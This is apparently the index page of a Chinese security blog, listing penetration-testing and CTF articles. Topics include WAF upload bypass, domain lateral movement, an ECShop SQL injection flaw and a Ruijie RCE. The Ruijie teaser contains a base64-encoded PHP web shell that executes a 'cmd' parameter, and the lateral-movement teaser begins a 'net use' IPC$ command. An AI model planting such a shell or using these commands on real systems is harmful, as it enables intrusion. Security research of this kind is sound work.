本文介绍的思路主要围绕针对于 POST 参数的 multipart/form-data 进行讨论。multipart/form-data 是为了解决上传文件场景下文件内容...
12月18日45 views评论http
php
实战分享 | Post文件上传WAF Bypass总结
12月18日45 views评论http
php
12月18日45 views评论http
php
实战 | Post文件上传WAF Bypass总结
本文介绍的思路主要围绕针对于 POST 参数的 multipart/form-data 进行讨论。multipart/form-data 是为了解决上传文件场景下文件内容...
12月17日29 views评论http
php
Red Team之7- tcp/udp - ECHO渗透
该主机上正在运行一个echo服务。echo服务用于测试和测量目的,可以监听TCP和UDP协议。服务器发送回它接收到的任何数据,不做任何修改。通过将回声服务连接到同一台或另一台机器上的回声服务,可能会导...
12月08日120 views评论service
tcp
【加班不再有】SHA2
【加班不再有】SHA2❝📌这里给出常见语言的「SHA2」调用方案,目前已按照语言的「字母序」(正序)进行排列,方便读者查找。❞Bash#!/bin/bashecho -n ""&n...
11月30日13 views评论echo
openssl
漏洞猎人赏金笔记-如何编写Bug Bounty自动化脚本
漏洞猎人赏金笔记-如何编写Bug Bounty自动化脚本声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法...
11月29日55 views评论id
脚本
干货 | 域渗透-横向移动命令总结
横向移动0x01 文件传输IPC$建立IPC$连接需要具备以下两个条件:①远程主机开启了IPC连接。②远程主机的139端口和445端口开放。net use \10.10.10.19IPC$ "admi...
11月29日40 views评论exe
txt
记录一道web题目
http://95d0deaf1ade4dada96134a916bce5e1ab4dfa4227fb4400.changame.ichunqiu.com/ php协议读取文件...
11月18日63 views记录一道web题目已关闭评论payload
php
记一次曲折的域环境渗透测试 IV
一、 环境 DMZ区域:Ubuntu (Web 1)配置了两个网卡,一个桥接可以对外提供服务;一个连接在VMnet8上连通第二层网络。第二层网络区域:Ubuntu (Web ...
08月02日34 views评论web
windows
ecshop 2.x/3.x sql注入/任意代码执行漏洞
前言:该漏洞影响ECShop 2.x和3.x版本,是一个典型的“二次漏洞”,通过user.php文件中display()函数的模板变量可控,从而造成SQL注入漏洞,而后又通过SQL注入漏洞将恶意代码注...
07月31日174 views评论sql注入
sql注入漏洞
超适合小白!Linux 之 shell 编程入门
来自:一口Linux一、变量的运用1. 变量命名界说变量时,变量名不加美元符号($,PHP言语中变量需求),如:your_name="yikoulinux"留神,变量名和等号之间不能有空格,这或许和你...
07月25日9 views评论ubuntu
字符串
BUUCTF: [极客大挑战 2019] Havefun (一起来撸猫)
[极客大挑战 2019]Havefun (一起来撸猫)前言一道简单基础的WEB题让我看到了生活的希望以及对未来充满了向往猛虎下山打开题目链接我们可以看到只是一个静态页面就连可以点的东西都没有还有就是猫...
07月23日89 views评论echo
get
Ruijie Networks RCE
echo "PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K" | base64 -d POC: POST /guest_auth/gu...
07月22日125 views评论poc
rce
12